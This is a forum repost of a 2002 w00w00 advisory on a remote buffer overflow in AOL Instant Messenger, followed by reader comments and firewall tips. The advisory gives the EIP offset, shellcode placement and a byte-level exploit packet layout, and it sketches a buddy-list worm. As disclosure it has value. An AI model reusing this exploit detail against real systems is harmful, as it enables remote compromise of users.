Posted on 01/02/2002 8:06:57 AM PST by softengine
PRELUDE
Happy w00year! It has been a while, friends, but w00w00 is still going strong! w00w00 is over three years old now and still boasts the title of the world's largest non-profit security team. One thing remains true about the world of w00w00, though: we love to shake things up.
We'd like to take a moment and make an important point. Due to unfortunate circumstances, the environment of the security industry has changed for the worse. Most major vendors and security companies have all switched their policies to limited disclosure, leaving the end users still vulnerable to serious software flaws. Big corporate monopolists: 1, end-users cornered into using second-rate software: 0. Why? Two big reasons: the DMCA and using patriotism as an excuse to avoid disclosing vulnerabilities.
First, the Digital Millenium Copyright Act affects circumvention of anti-piracy mechanisms and reverse engineering. If a product is released in binary form only (i.e., AOL) to protect its technologies and one attempts to reverse engineer the file, it's a violation of the DMCA. It's no question who the lobbyists behind this law were: the big corporations. Not surprisingly, AOL Time Warner was one of the DMCA's biggest supporters. Find out more information about the DMCA at http://www.anti-dmca.org.
Second, Microsoft has "decried" information anarchy. Many major security companies have followed suit and the rest just bent to the pressure. However, blaming security research teams, such as w00w00, for releasing information on vulnerabilities is a cop-out. Whether or not security research teams release information on vulnerabilities, it doesn't change the fact that the vendor produced insecure software. Vulnerabilities are still exploited in the same way they were by the Internet Worm 13 years ago. Further, one can reasonably assume that a fair number of hackers are exploiting unpublished vulnerabilities.
By only silently updating products, computer users are unknowingly left vulnerable.
DESCRIPTION
AOL Instant Messenger (AIM) has a major security vulnerability in the latest stable (4.7.2480) and beta (4.8.2616) Windows versions. This vulnerability will allow remote penetration of the victim's system without any indication as to who performed the attack. There is no opportunity to refuse the request. This does not affect the non-Windows versions, because the non-Windows versions currently do not yet support the feature that this vulnerability occurs in.
This particular vulnerability results from an overflow in the code that parses a game request. The actual overflow appears to be in the parsing of TLV type 0x2711. This may be more generic and exploitable through other means, but AOL has not released enough information about their protocol for us to be able to determine that. Robbie Saunder's email yesterday should be enough of a hint which direction to look in.
We contacted the AOL Instant Messenger group but never received a response. Normally we would be inclined to provide a fix, but it is illegal to reverse engineer the AIM executable (DMCA and AIM's license agreement to thank), so we are unable to provide a patch which will modify it. Instead, we recommend Robbie Saunder's AIM Filter (http://www.ssnbc.com/wiz/) to protect yourselves.
IMPLICATIONS
AOL Instant Messenger (http://www.aim.com) has over 100 million users. We think that deserves repeating: 100 million users. Almost all of these users are Windows users and directly vulnerable to this.
The first implication is that AOL should feel the weight of responsibility and employ better software development practices. The developers of a product with so many users should be much more cautious and avoid overbloating with a multitude of features they didn't have time to properly test in the first place.
Overall, though, the implications of this vulnerability are huge and leave the door wide open for a worm not unlike those that Microsoft (*cough* corporate monopoly *cough*) Outlook, IIS, et al. have all had (Melissa, ILOVEYOU, CodeRed, nimda, etc.). An exploit could easily be amended to download itself off the web, determine the buddies of the victim, and then attack them also. Given the general nature of social networks and how they are structured, we predict that it wouldn't take long for such an attack to propagate.
To top everything off, the particular overflow described supra is relatively simple to exploit. The payload can be several thousand bytes long, which leaves lots of room for creative shellcode. In addition, the shellcode can have null bytes in it, as long as the shellcode is located after the offset to EIP in the shellcode. That is, the offset to EIP is 1723 bytes into TLV type 0x2711. So if the shellcode is located after offset 1726, null bytes can be left in.
EXPLOIT
This is the exploit packet generated by w00aimexp (without USE_FULL_SIZE defined):
FLAP header (6 bytes)
[\x2a] '*' (magic number)
[\x02] channel (data)
[\x00\x11] seqnum number
[\x07\x87] packet length (1927 bytes)
SNAC header (10 bytes)
[\x00\x04] SNAC family (message)
[\x00\x06] SNAC type (outgoing message)
[\x00\x00] SNAC flags (none)
[\x00\x00\x00\x09] SNAC ID
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
[\x00\x02] SNAC channel (data)
[\x0c] victim screen name length
[\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX] victim screen name
Now a set of TLV data types. There is a base container, type 0x05, that contains everything else. Inside of this are several smaller containers, with each TLV type following immediately after the previous. If those are misaligned, you'll receive a "busted SNAC payload" error. [\x00\x05] TLV type (0x05)
[\x07\x62] TLV length (1890 bytes)
[\x00\x00] cookie marker
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
Capability used to exploit this libfaim calls it (SAVESTOCKS): [\x09\x46\x13\x47\x4c\x7f\x11\xd1\x82\x22\x44\x45\x53\x54\x00\x00]
[\x00\x0a] TLV type (0x0a)
[\x00\x02] TLV length (2 bytes)
[\x00\x01] TLV data
[\x00\x0f] TLV type (0x0f)
[\x00\x00] TLV length (0)
[\x00\x0e] TLV type (0x0e)
[\x00\x02] TLV length (2 bytes)
["en"] TLV data (language)
[\x00\x0d] TLV type (0x0d)
[\x00\x08] TLV length (8 bytes)
["us-ascii"] TLV data (charset)
[\x00\x0c] TLV type (0x0d)
[\x00\x06] TLV length (6 bytes)
["w00w00"] TLV data (game's name?)
[\x00\x03] TLV type (0x03)
[\x00\x04] TLV length (4 bytes) [\x40\xa3\x1e\x4f]
[\x00\x05] TLV type (0x05)
[\x00\x02] TLV length (2 byte)
[\x14\x46] [\x00\x07] TLV type
(0x07) [\x00\x4d] TLV length
(77 bytes) ["aim:AddGame?name=w00w00&go1st=true&multiplayer=true&url=http://www.w00w00.org"]
[\x27\x11] TLV type (0x2711)
[\x06\xbf] TLV length (22 + length of our shellcode = 1727 bytes)
[\x00\x00\x02\x00\x05\x07\x4c\x7f\x11\xd1\x82\x22\x44\x45\x53 \x54\x00\x00\x00\x0b\x00\x09 + shellcode starts here]
Is there a reliable alternative out there that will let her IM her friends and relatives without the risk (or embarassment) of having an AOL product installed on our machine?
This remote attack cannot be stopped even by a firewall like zone alarm, correct?
Whew! For a moment there I thought you were going to tell me that the guy who said he was from AOL Billing department and needed my password, was a phony.
I guess I'm safe.
Likely correct. If a firewall is programmed to permit application X to communicate inbound via port YYZZ, then AIM, using port YYZZ, will bypass the firewall allowing nefarious use of your entire system by those with knowledge of the security hole.
AOL Instant Messenger, Yahoo Messenger, MSN Messenger, ICQ and mIRC (Internet Relay Chat) are all popular free chat software programs that allow real time conversations and file transfers. To use with ZoneAlarm active, all chat software requires server rights. You assign these rights in the Programs panel.
It is strongly advised to check your chat software options to deny file transfers without prompting first. File transfer within chat programs is a means to distribute malware such as worms, viruses, nukes, and trojan horses. Check with your chat software vendor's help files for configuration options to maximize security.
mIRC and ICQ especially will be portscanned. mIRC and ICQ channels are breeding grounds for adventurous hackers seeking to harvest IP addresses. What they hope to determine is if you have a Trojan listening on a Windows port that can be accessed. This process is what is known as a "staging area" to launch denial of service attacks anonymously. The pitfall for good net citizens is not realizing their machines are being used as part of the staging area. Using chat software wisely in conjunction with ZoneAlarm and ZoneAlarm Pro will prevent this type of activity from breaching your computing environment.
By specifying that you trust an application within ZoneAlarm, you are giving that application the ability to communicate with the Internet. Therefore the onus is on users of chat software and public message forums to learn responsible web habits. Understanding the vulnerabilities of the software you use is the first step in protecting your technology investment.
A tip for enabling mIRC to work with ZoneAlarm, we suggest disabling the IDENT feature located in the IDENT tab within mIRC.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.